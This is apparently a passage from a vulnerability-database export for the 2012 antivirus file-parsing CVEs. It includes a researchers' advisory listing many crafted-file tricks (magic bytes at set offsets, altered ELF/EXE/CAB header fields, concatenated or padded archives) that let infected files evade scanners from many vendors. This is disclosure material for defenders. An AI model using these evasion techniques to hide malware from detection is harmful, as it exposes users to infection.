            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1419",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1439",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1426",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1429",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1436",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1440",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1432",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1438",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1428",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1446",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1443",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1444",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1441",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1421",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1430",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1434",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1435",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1424",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1431",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1425",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1423",
         },
         {
            trust: 0.1,
            url: "http://www.ieee-security.org/tc/sp2012/",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1442",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1422",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1433",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1420",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1427",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1445",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1437",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52612",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            date: "2012-03-19T23:51:01",
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            date: "2012-03-21T10:11:48.083000",
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-11-06T00:00:00",
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            date: "2015-03-19T08:41:00",
            db: "BID",
            id: "52612",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            date: "2012-11-06T05:09:04.360000",
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            date: "2012-04-01T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple products  RAR Vulnerability that prevents file parsers from detecting malware",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
      trust: 0.6,
   },
}

var-201203-0385
Vulnerability from variot

The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By a third party \50\4B\03\04 Has a character sequence starting with POSIX TAR Malware detection may be avoided via files. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. The following products are affected: AVIRA AntiVir Engine 7.11.1.163 Antiy Antiy-AVL 2.0.3.7 Quick Heal Technologies CAT-QuickHeal 11.00 Emsisoft Antivirus 5.1.0.1 Ikarus Antivirus T3.1.1.97.0 Jiangmin 13.0.900 Kaspersky Antivirus 7.0.0.125 McAfee 5.400.0.1158 McAfee-GW-Edition 2010.1C NOD32 5795 Norman Antivirus 6.06.12 PCTools Antivirus 7.0.3.5 Symantec AntiVirus 20101.3.0.103 TrendMicro 9.120.0.1004 TrendMicro-HouseCall 9.120.0.1004. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.

Vulnerability Descriptions

  1. Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.

Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00

CVE no - CVE-2012-1419

  1. Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03

CVE no - CVE-2012-1420

  1. Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103

CVE no - CVE-2012-1421

  1. Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1422

  1. Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.

Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0

CVE no - CVE-2012-1423

  1. Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0

CVE no - CVE-2012-1424

  1. Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1426

  1. Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1427

  1. Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1428

  1. Specially crafted infected ELF files with "ustar" at offset 257 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01

CVE no - CVE-2012-1429 12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1430 13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1431

  1. Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1432

  1. Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1433

  1. Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1434

  1. Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1435

  1. Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1436

  1. Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.

Affected products - Comodo 7425

CVE no - CVE-2012-1437

  1. Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.

Affected products - Comodo 7425, Sophos 4.61.0

CVE no - CVE-2012-1438

  1. 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1439

  1. 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.

Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1440

  1. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
    If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - Prevx 3.0

'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc', 'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and 'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0

CVE no - CVE-2012-1441

  1. 'class' field in ELF files is parsed incorrectly.
    If an infected ELF file's class field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1442

  1. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.

Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2

CVE no - CVE-2012-1443

  1. 'abiversion' field in ELF files is parsed incorrectly.
    If an infected ELF file's abiversion field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1444

  1. 'abi' field in ELF files is parsed incorrectly.
    If an infected ELF file's abi field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1445

  1. 'encoding' field in ELF files is parsed incorrectly.
    If an infected ELF file's encoding field is incremented by 1 it evades detection. 'e_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's e_version field is incremented by 1 it evades detection.

Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7

CVE no - CVE-2012-1447

  1. 'cbCabinet' field in CAB files is parsed incorrectly.
    If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1

CVE no - CVE-2012-1448

  1. 'vMajor' field in CAB files is parsed incorrectly.
    If an infected CAB file's vMajor field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1449

  1. 'reserved3' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1450

  1. 'reserved2' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved2 field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1451

  1. 'reserved1' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00

CVE no - CVE-2012-1452

  1. 'coffFiles' field in CAB files is parsed incorrectly.
    If an infected CAB file's coffFiles field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1453

  1. 'ei_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's version field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1454

  1. 'vMinor' field in CAB files is parsed incorrectly.
    If an infected CAB file's version field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1455

  1. A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection.

Affected products - AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004

CVE no - CVE-2012-1456

  1. If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.

Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0

CVE no - CVE-2012-1457

  1. A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.

If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.

Affected products - ClamAV 0.96.4, Sophos 4.61.0

CVE no - CVE-2012-1458

  1. In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.

If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.

Affected products - AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0

CVE no - CVE-2012-1459

  1. If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2

CVE no - CVE-2012-1460

  1. GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly

Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2

CVE no - CVE-2012-1461

  1. If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes

Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103

CVE no - CVE-2012-1462

  1. In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.

Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7

CVE no - CVE-2012-1463

Credits

Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.

References

"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0385",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "antivirus",
            scope: "eq",
            trust: 2.4,
            vendor: "fortinet",
            version: "4.2.254.0",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11 avengine 20101.3.0.103",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
